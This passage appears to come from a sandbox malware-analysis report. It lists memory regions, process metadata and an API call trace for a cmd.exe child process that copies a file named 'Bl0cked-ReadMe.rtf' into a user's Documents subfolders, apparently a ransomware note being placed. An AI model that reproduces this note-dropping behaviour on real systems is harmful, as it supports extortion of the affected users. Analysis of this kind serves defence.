0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10665 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10666 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10667 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10668 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10669 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 10670 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10671 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 142 os_tid = 0x488 Process: id = "86" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10694 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10695 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10696 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10697 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 10698 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10699 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10700 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10701 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10702 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10703 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10909 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10910 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10911 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10912 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10913 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 10914 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10915 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10916 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10917 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10918 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10919 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10920 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10921 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10922 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10923 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 10924 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10925 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10926 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 10927 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10928 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10929 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10930 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 10931 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 10932 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 144 os_tid = 0x924 [0128.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe84 | out: lpSystemTimeAsFileTime=0x2afe84*(dwLowDateTime=0x86bf7520, dwHighDateTime=0x1d440a9)) [0128.870] GetCurrentProcessId () returned 0x928 [0128.870] GetCurrentThreadId () returned 0x924 [0128.870] GetTickCount () returned 0x29452 [0128.870] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe7c | out: lpPerformanceCount=0x2afe7c*=18565919177) returned 1 [0128.870] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0128.871] __set_app_type (_Type=0x1) [0128.871] __p__fmode () returned 0x76b331f4 [0128.871] __p__commode () returned 0x76b331fc [0128.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0128.871] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0128.871] GetCurrentThreadId () returned 0x924 [0128.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x924) returned 0x38 [0128.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.871] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0128.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.871] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.871] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afe14 | out: phkResult=0x2afe14*=0x0) returned 0x2 [0128.872] VirtualQuery (in: lpAddress=0x2afe4b, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.872] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afde4, dwLength=0x1c | out: lpBuffer=0x2afde4*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0128.872] GetConsoleOutputCP () returned 0x1b5 [0128.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.872] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0128.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0128.876] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.876] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.877] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.877] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0128.881] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.881] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.881] GetEnvironmentStringsW () returned 0xa01b8* [0128.882] FreeEnvironmentStringsW (penv=0xa01b8) returned 1 [0128.882] GetEnvironmentStringsW () returned 0xa01b8* [0128.882] FreeEnvironmentStringsW (penv=0xa01b8) returned 1 [0128.882] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0xf0, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegCloseKey (hKey=0x40) returned 0x0 [0128.882] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed84 | out: phkResult=0x2aed84*=0x40) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x40, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x1, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x0, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x4, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x4) returned 0x0 [0128.882] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed8c, lpData=0x2aed90, lpcbData=0x2aed88*=0x1000 | out: lpType=0x2aed8c*=0x0, lpData=0x2aed90*=0x9, lpcbData=0x2aed88*=0x1000) returned 0x2 [0128.882] RegCloseKey (hKey=0x40) returned 0x0 [0128.883] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886363 [0128.883] srand (_Seed=0x5b886363) [0128.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0128.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0128.883] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.883] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa1918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0128.883] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.883] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.883] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.883] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.883] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.883] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.883] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.883] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.884] GetEnvironmentStringsW () returned 0xa2308* [0128.884] FreeEnvironmentStringsW (penv=0xa2308) returned 1 [0128.884] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.884] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.884] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.884] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.884] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.884] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.884] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb50, lpFilePart=0x2afb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb4c*="Desktop") returned 0x18 [0128.884] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.884] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.884] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.884] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.884] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.885] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.885] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.885] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.885] GetEnvironmentStringsW () returned 0xa2b28* [0128.885] FreeEnvironmentStringsW (penv=0xa2b28) returned 1 [0128.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.885] GetConsoleOutputCP () returned 0x1b5 [0128.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.886] GetUserDefaultLCID () returned 0x409 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc90, cchData=128 | out: lpLCData="1") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.886] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.887] GetConsoleTitleW (in: lpConsoleTitle=0x90908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0128.888] _wcsicmp (_String1="type", _String2=")") returned 75 [0128.888] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0128.888] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0128.888] _wcsicmp (_String1="IF", _String2="type") returned -11 [0128.888] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0128.888] _wcsicmp (_String1="REM", _String2="type") returned -2 [0128.888] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] GetFileType (hFile=0x7) returned 0x2 [0128.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afb88 | out: lpMode=0x2afb88) returned 1 [0128.893] _dup (_FileHandle=1) returned 3 [0128.893] _close (_FileHandle=1) returned 0 [0128.893] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0128.893] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afb58, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0128.895] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0128.895] GetConsoleTitleW (in: lpConsoleTitle=0x2af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.895] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0128.895] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0128.895] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0128.895] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0128.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.896] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af4ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af4ec) returned 0x90eb8 [0128.897] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0128.897] 